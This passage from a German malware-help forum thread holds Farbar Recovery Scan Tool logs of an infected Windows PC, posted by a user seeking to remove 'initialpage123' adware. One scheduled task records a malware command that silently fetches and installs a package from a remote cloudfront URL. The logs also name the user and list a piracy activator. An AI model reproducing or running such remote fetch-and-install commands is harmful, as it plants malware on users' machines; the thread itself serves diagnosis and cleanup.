2017-03-15 19:51 - 2017-02-04 19:17 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2017-03-15 19:51 - 2017-02-04 19:10 - 01491456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2017-03-15 19:51 - 2017-02-04 19:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2017-03-15 19:51 - 2017-01-21 23:37 - 00567152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2017-03-15 19:51 - 2017-01-21 21:27 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-03-15 19:51 - 2017-01-21 21:27 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-03-15 19:51 - 2017-01-21 20:40 - 00756736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-03-15 19:51 - 2017-01-21 20:40 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-03-15 19:51 - 2017-01-14 19:49 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\wininit.exe
2017-03-15 19:51 - 2017-01-11 21:37 - 02345984 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-03-15 19:51 - 2017-01-10 21:08 - 01549312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2017-03-15 19:51 - 2017-01-05 19:29 - 05273600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\glcndFilter.dll
2017-03-15 19:51 - 2017-01-05 18:57 - 05268480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2017-03-15 17:59 - 2017-03-15 17:59 - 00001110 _____ C:\Users\Public\Desktop\Adobe Photoshop CS6.lnk
2017-03-15 17:59 - 2017-03-15 17:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CS6
2017-03-15 17:59 - 2017-03-15 17:59 - 00000000 ____D C:\Program Files (x86)\Adobe Photoshop CS6
2017-03-13 23:02 - 2017-03-13 23:02 - 03164345 _____ C:\Windows\455cd42b03953ae3030f3e9254843325.exe
2017-03-09 19:55 - 2017-03-09 19:55 - 03526400 _____ (Intel Corporation) C:\Windows\system32\Drivers\Netwbw02.sys
2017-03-09 19:55 - 2017-03-09 19:55 - 02553264 _____ (Intel Corporation) C:\Windows\system32\Netwuw04.dll
2017-03-09 15:48 - 2017-03-09 15:48 - 10719648 _____ C:\Windows\system32\Drivers\Netwfw02.dat
2017-03-09 15:14 - 2017-02-23 16:50 - 00093360 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-03-09 15:14 - 2017-02-22 16:35 - 01609216 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-03-09 15:14 - 2017-02-22 16:35 - 00646656 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 01286144 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-03-09 15:14 - 2017-01-18 16:35 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-03-07 15:59 - 2017-03-07 15:59 - 00003330 _____ C:\Users\Nick Schuster\AppData\Local\recently-used.xbel
2017-03-07 15:50 - 2017-03-07 15:50 - 00000919 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk
2017-03-07 15:49 - 2017-03-07 15:49 - 00000000 ____D C:\Program Files\GIMP 2
2017-03-07 15:45 - 2017-03-07 15:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\gtk-2.0
2017-03-07 15:45 - 2017-03-07 15:45 - 00000000 ____D C:\Users\Nick Schuster\.thumbnails
2017-03-07 15:40 - 2017-05-16 15:15 - 00000000 ____D C:\Users\Nick Schuster\.gimp-2.8
2017-03-07 15:40 - 2017-03-07 15:40 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\gegl-0.2
2017-03-07 15:40 - 2017-03-07 15:40 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\fontconfig

==================== Drei Monate: Ge鋘derte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-06-05 10:14 - 2015-12-26 16:48 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3847841184-804715454-2304624315-1001
2017-06-05 10:11 - 2016-11-16 18:44 - 00000354 _____ C:\Users\Public\Documents\temp.dat
2017-06-05 10:10 - 2017-02-20 22:17 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Mozilla
2017-06-05 10:10 - 2016-11-16 18:46 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-06-05 10:10 - 2016-07-31 16:09 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\CrashDumps
2017-06-05 10:09 - 2015-12-26 22:26 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-06-05 10:09 - 2015-12-26 17:53 - 00000000 __SHD C:\Users\Nick Schuster\IntelGraphicsProfiles
2017-06-05 10:09 - 2015-12-26 17:46 - 00000000 __RDO C:\Users\Nick Schuster\OneDrive
2017-06-05 10:08 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-06-04 10:17 - 2016-09-17 17:52 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\vlc
2017-06-03 14:01 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2017-06-02 16:14 - 2016-06-01 16:03 - 01862144 ___SH C:\Users\Nick Schuster\Downloads\Thumbs.db
2017-06-01 23:52 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-06-01 21:52 - 2013-08-22 15:36 - 00000000 ____D C:\Program Files\Quick Tharks Screen Saver
2017-06-01 19:26 - 2015-12-29 20:54 - 00000000 ____D C:\Windows\pss
2017-06-01 12:01 - 2016-07-05 17:55 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Adblock Plus for IE
2017-06-01 12:00 - 2014-11-21 05:35 - 01776918 _____ C:\Windows\system32\PerfStringBackup.INI
2017-06-01 12:00 - 2014-11-21 04:45 - 00765582 _____ C:\Windows\system32\perfh007.dat
2017-06-01 12:00 - 2014-11-21 04:45 - 00159366 _____ C:\Windows\system32\perfc007.dat
2017-06-01 00:15 - 2017-01-03 13:21 - 00000000 ____D C:\ProgramData\windows
2017-05-31 17:34 - 2017-02-12 14:31 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Bluestacks
2017-05-31 17:34 - 2013-08-22 17:36 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-31 17:31 - 2016-06-14 20:57 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Sony
2017-05-31 14:36 - 2016-11-23 19:13 - 01784108 _____ C:\spyhunter.fix
2017-05-31 13:52 - 2016-09-17 17:56 - 00000000 ____D C:\ProgramData\Apple
2017-05-30 19:32 - 2016-10-08 16:17 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Deployment
2017-05-30 14:12 - 2016-12-27 21:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-05-30 14:11 - 2015-12-27 21:26 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Google
2017-05-30 14:05 - 2017-02-03 12:28 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Samsung
2017-05-30 14:05 - 2017-02-03 12:27 - 00000000 ____D C:\Program Files (x86)\Samsung
2017-05-30 14:05 - 2016-10-23 18:05 - 00000000 ____D C:\ProgramData\Samsung
2017-05-29 23:08 - 2017-02-13 16:13 - 00000000 ____D C:\Program Files (x86)\Minecraft
2017-05-29 23:08 - 2016-12-10 12:29 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\.minecraft
2017-05-29 22:00 - 2016-01-02 17:50 - 00000306 __RSH C:\ProgramData\ntuser.pol
2017-05-29 21:59 - 2016-10-12 16:07 - 00000000 ____D C:\Program Files\Image-Line
2017-05-27 11:41 - 2016-01-11 18:42 - 07413248 ___SH C:\Users\Nick Schuster\Desktop\Thumbs.db
2017-05-26 18:19 - 2016-11-18 17:58 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-26 10:55 - 2016-01-04 18:15 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-25 15:49 - 2017-02-14 16:53 - 00000000 ____D C:\ProgramData\SUPPORTDIR
2017-05-25 15:49 - 2017-02-14 16:53 - 00000000 ____D C:\ProgramData\install_backup
2017-05-25 15:49 - 2017-02-03 12:27 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-25 15:49 - 2016-10-13 22:01 - 00000000 ____D C:\ProgramData\TEMP
2017-05-24 11:40 - 2017-02-27 11:37 - 00000000 ____D C:\ProgramData\CanonIJPLM
2017-05-23 15:40 - 2013-08-22 17:20 - 00000000 ____D C:\Windows\CbsTemp
2017-05-23 15:34 - 2015-12-28 20:55 - 132223576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-05-23 15:34 - 2015-12-28 20:55 - 00000000 ____D C:\Windows\system32\MRT
2017-05-22 21:46 - 2015-12-27 00:10 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Skype
2017-05-22 21:24 - 2016-09-24 19:16 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-22 21:24 - 2015-12-27 00:10 - 00002715 _____ C:\Users\Public\Desktop\Skype.lnk
2017-05-22 21:24 - 2015-12-27 00:10 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-05-22 21:24 - 2015-12-27 00:10 - 00000000 ____D C:\ProgramData\Skype
2017-05-21 19:04 - 2015-12-26 22:50 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2017-05-21 19:03 - 2017-02-26 13:05 - 00000991 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 12.lnk
2017-05-21 19:03 - 2017-02-26 13:05 - 00000979 _____ C:\Users\Public\Desktop\TeamViewer 12.lnk
2017-05-17 21:05 - 2015-12-28 13:23 - 00000000 ____D C:\Users\Nick Schuster\Desktop\982652986578268672
2017-05-17 18:44 - 2016-08-20 12:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\TeamViewer
2017-05-17 17:00 - 2016-09-14 15:11 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Adobe
2017-05-17 16:58 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-05-17 16:41 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\FxsTmp
2017-05-14 16:21 - 2016-07-31 16:03 - 05282048 _____ C:\Windows\system32\FNTCACHE.DAT
2017-05-14 16:16 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-05-13 00:45 - 2017-02-12 16:33 - 00000000 ____D C:\Users\Nick Schuster\Desktop\BSHelper
2017-05-09 18:25 - 2016-11-08 22:46 - 00004496 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-05-09 18:25 - 2016-10-13 18:22 - 00004342 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-05-09 17:25 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\Macromed
2017-05-07 13:16 - 2016-12-17 15:58 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Chromium

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-12-12 23:28 - 2016-12-12 23:28 - 0001120 _____ () C:\Users\Nick Schuster\AppData\Roaming\.minecraft - Verkn黳fung.lnk
2010-08-28 22:43 - 2010-08-28 22:43 - 0096256 ____N (Google, inc) C:\Users\Nick Schuster\AppData\Roaming\AdbWinApi.dll
2010-08-28 22:43 - 2010-08-28 22:43 - 0060928 ____N (Google, inc) C:\Users\Nick Schuster\AppData\Roaming\AdbWinUsbApi.dll
2016-07-31 15:02 - 2016-07-31 15:02 - 7129600 _____ () C:\Users\Nick Schuster\AppData\Roaming\agent.dat
2017-01-03 13:27 - 2017-01-03 13:20 - 1052256 _____ () C:\Users\Nick Schuster\AppData\Roaming\avv.exe
2016-07-31 15:01 - 2016-07-31 15:01 - 0129024 _____ () C:\Users\Nick Schuster\AppData\Roaming\Installer.dat
2016-07-31 15:02 - 2016-07-31 15:02 - 0018432 _____ () C:\Users\Nick Schuster\AppData\Roaming\Main.dat
2016-07-31 15:03 - 2016-02-18 10:10 - 5267952 _____ () C:\Users\Nick Schuster\AppData\Roaming\ziptool_wc-9015_setup.exe
2017-04-04 00:34 - 2017-04-04 13:52 - 0000000 _____ () C:\Users\Nick Schuster\AppData\Roaming\Microsoft\taskhw.exe
2017-03-07 15:59 - 2017-03-07 15:59 - 0003330 _____ () C:\Users\Nick Schuster\AppData\Local\recently-used.xbel
2016-01-07 17:00 - 2016-12-17 21:05 - 0007598 _____ () C:\Users\Nick Schuster\AppData\Local\Resmon.ResmonCfg
2017-02-12 14:36 - 2017-04-22 20:22 - 0000552 _____ () C:\Users\Nick Schuster\AppData\Local\TroubleshooterConfig.json
2016-10-21 22:16 - 2016-10-23 18:04 - 0000158 _____ () C:\Users\Nick Schuster\AppData\Local\uts.ini

Dateien, die verschoben oder gel鰏cht werden sollten:
====================
C:\Users\Nick Schuster\AppData\Roaming\gplyra\gplyra.exe
C:\Windows\TEMP\gB39B.tmp.exe


Einige Dateien in TEMP:
====================
2017-05-31 17:34 - 2017-01-26 10:58 - 0990744 _____ (BlueStack Systems, Inc.) C:\Users\Nick Schuster\AppData\Local\Temp\BluestacksUninstaller.exe
2017-05-31 17:34 - 2017-01-26 10:57 - 0187416 _____ (BlueStack Systems) C:\Users\Nick Schuster\AppData\Local\Temp\HD-LibraryHandler.dll
2017-05-31 17:34 - 2017-01-26 10:55 - 0246808 _____ (BlueStack Systems) C:\Users\Nick Schuster\AppData\Local\Temp\HD-Logger-Native.dll
2017-05-30 16:39 - 2014-05-27 06:39 - 0053248 _____ (Microsoft Corporation) C:\Users\Nick Schuster\AppData\Local\Temp\svhost.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix f黵 Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-23 15:34

==================== Ende von FRST.txt ============================
         
--- --- ---

[/CODE]


Alt 05.06.2017, 10:33   #6
NexsReloaded
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



Code:
ATTFilter
Zus鋞zliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-06-2017
durchgef黨rt von Nick Schuster (05-06-2017 10:16:25)
Gestartet von C:\Users\Nick Schuster\Desktop
Windows 8.1 (Update) (X64) (2015-12-26 14:37:47)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3847841184-804715454-2304624315-500 - Administrator - Disabled)
Gast (S-1-5-21-3847841184-804715454-2304624315-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3847841184-804715454-2304624315-1003 - Limited - Enabled)
Nick Schuster (S-1-5-21-3847841184-804715454-2304624315-1001 - Administrator - Enabled) => C:\Users\Nick Schuster

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" k鰊nen in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe After Effects CC 2015 (HKLM-x32\...\{147EC100-14BE-45EF-AB42-35BAEE7D02F0}) (Version: 13.6.1 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Photoshop CS6 Version 13.0.1 (HKLM-x32\...\{A724DC44-6241-42D3-BA57-778B178ABC17}_is1) (Version: 13.0.1 - Adobe Systems, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.7.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.4.4 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.7.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.20.13 - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 5.2.0 - Canon Inc.)
Canon MG5700 series Benutzerregistrierung (HKLM-x32\...\Canon MG5700 series Benutzerregistrierung) (Version:  - *Canon Inc.)
Canon MG5700 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5700_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.3.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.7.1 - Canon Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.1.2 - )
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio 12.1.2 (HKLM\...\FL Studio 12.1.2_is1) (Version:  - )
FL Studio ASIO (HKLM\...\FL Studio ASIO) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
FreeOCR v5.4 (HKLM-x32\...\freeocr_is1) (Version:  - )
GIMP 2.8.20 (HKLM\...\GIMP-2_is1) (Version: 2.8.20 - The GIMP Team)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
HandBrake 0.10.5 (HKLM-x32\...\HandBrake) (Version: 0.10.5 - )
initialpage123 - Uninstall (HKLM-x32\...\{F566FB96-67A4-4E6C-B262-2AE76A61F74F}) (Version:  - ) <==== ACHTUNG
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MegaDownloader 1.7 (HKLM\...\{C12C2297-65A4-4E64-9AE1-29F0D947FDA0}}_is1) (Version: 1.7 - AppsForMega.info)
Microsoft OneDrive (HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022.218 (HKLM-x32\...\{E503B4BF-F7BB-3D5F-8BC8-F694B1CFF942}) (Version: 9.0.21022.218 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 53.0.3 (x64 de) (HKLM\...\Mozilla Firefox 53.0.3 (x64 de)) (Version: 53.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.3 - Mozilla)
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SpyHunter 4 (HKLM-x32\...\SpyHunter) (Version: 4.24.3.4750 - Enigma Software Group, LLC)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
SwytShop version 1.0 (HKU\.DEFAULT\...\SwytShopAlgoadChrome_Pkg3a_is1) (Version: 1.0 - SwytShop)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.77242 - TeamViewer)
VirtualDJ 8 (HKLM-x32\...\{2C513174-818D-4D9E-B88F-3E2872BACA20}) (Version: 8.2.3493.0 - Atomix Productions)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.40 (32-Bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Nick Schuster\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileCoAuthLib64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{D3BB05A4-7B0B-D6FE-9C46-02343C11E1C8}\InprocServer32 -> kein Dateipfad
CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{DC9D74AA-7319-69B5-E1DE-59842454B0BE}\InprocServer32 -> kein Dateipfad

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {006195E7-5B35-4800-8C6E-E8E48BDE5D59} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe 
Task: {05D48E00-BF2C-4CEB-B7DF-04409233784E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-17] (Google Inc.)
Task: {12EA2644-53AB-4F3B-8420-DDC68495A6C2} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
Task: {1400CED9-EAA0-49F8-A50B-2477914720B4} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3847841184-804715454-2304624315-1001
Task: {16129431-3A87-44D6-B1E9-5B37A253A591} - System32\Tasks\RunAtStartup => C:\Users\Nick Schuster\AppData\Roaming\Event Monitor\em.exe  <==== ACHTUNG
Task: {169116B2-0EF1-475C-8491-807AAB8364E3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Puperpysikuy => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&amp;d=20170529 /q <==== ACHTUNG
Task: {2A619B04-44F2-4A39-B52E-0AD07E393C91} - System32\Tasks\Prervadom Cloud => C:\Program Files (x86)\Mlecultfowudom\zerfotain.exe 
